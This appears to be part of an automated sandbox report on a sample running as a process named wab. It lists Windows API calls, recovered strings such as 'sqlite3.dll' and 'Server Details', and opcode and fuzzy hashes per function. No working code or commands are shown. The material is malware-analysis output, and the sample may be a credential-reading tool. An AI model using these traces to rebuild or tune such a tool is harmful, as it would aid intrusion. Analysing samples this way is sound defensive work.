                                • Instruction ID: 8500237f8b168207f1c9a25e89cff2ec53edf3448a21c69821c5a9264d9502ca
                                • Opcode Fuzzy Hash: 2010a019ef781dd6939f17f8e62f95d5074ac9a6fd296138cb71cbff55b3af76
                                • Instruction Fuzzy Hash: 3C016279800205AADB209F59C845AEBB7F8FF85B45F00802DE894B6241D374A945CB79
                                APIs
                                • LoadMenuA.USER32(00000000), ref: 00409078
                                • sprintf.MSVCRT ref: 0040909B
                                  • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                  • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                  • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                  • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                  • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                  • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                  • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                • String ID: menu_%d
                                • API String ID: 1129539653-2417748251
                                • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                APIs
                                Strings
                                • failed memory resize %u to %u bytes, xrefs: 00411706
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: _msizerealloc
                                • String ID: failed memory resize %u to %u bytes
                                • API String ID: 2713192863-2134078882
                                • Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                • Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
                                • Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                • Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
                                APIs
                                  • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104), ref: 00406FA1
                                • strrchr.MSVCRT ref: 00409808
                                • _mbscat.MSVCRT ref: 0040981D
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: FileModuleName_mbscatstrrchr
                                • String ID: _lng.ini
                                • API String ID: 3334749609-1948609170
                                • Opcode ID: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                                • Instruction ID: 627d3aba04136714d7c1818045af5338c576ea1e6c84acb30438f8bc90b354f8
                                • Opcode Fuzzy Hash: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                                • Instruction Fuzzy Hash: 73C080019497D018F12235212D03F4F06884F83709F34005FF801796C3EF9CA611407F
                                APIs
                                • _mbscpy.MSVCRT ref: 004070EB
                                  • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                  • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                • _mbscat.MSVCRT ref: 004070FA
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: _mbscat$_mbscpystrlen
                                • String ID: sqlite3.dll
                                • API String ID: 1983510840-1155512374
                                • Opcode ID: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                • Opcode Fuzzy Hash: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                APIs
                                • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: PrivateProfileString
                                • String ID: A4@$Server Details
                                • API String ID: 1096422788-4071850762
                                • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                                • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                                APIs
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpy$memset
                                • String ID:
                                • API String ID: 438689982-0
                                • Opcode ID: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                • Instruction ID: 02088d5bd302ba8124152156f4c24fba1fa2279ed4138068a4a2dd0dfc44ef6b
                                • Opcode Fuzzy Hash: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                • Instruction Fuzzy Hash: BC61BDB2604712AFD710DF65E8C1B2BB7E5FF84304F40892EF99896250D338E955CB9A
                                APIs
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: FreeLocalmemcpymemsetstrlen
                                • String ID:
                                • API String ID: 3110682361-0
                                • Opcode ID: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                                • Opcode Fuzzy Hash: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                                APIs
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpy
                                • String ID:
                                • API String ID: 3510742995-0
                                • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8
                                APIs
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??2@$memset
                                • String ID:
                                • API String ID: 1860491036-0
                                • Opcode ID: c78329486846fe93a7256add11836ddf78ca18624f4c1b8479d66424083257ec
                                • Instruction ID: ded700a689dc4ea077b1bf28e8ae47d2b9e76a7afd7a7e1dd26f08861e755b16
                                • Opcode Fuzzy Hash: c78329486846fe93a7256add11836ddf78ca18624f4c1b8479d66424083257ec
                                • Instruction Fuzzy Hash: 0B21B6B0A547508EE7558F6A9845A16FAE4FFD0710726C8AFD109DB2B2E7B8D8408F14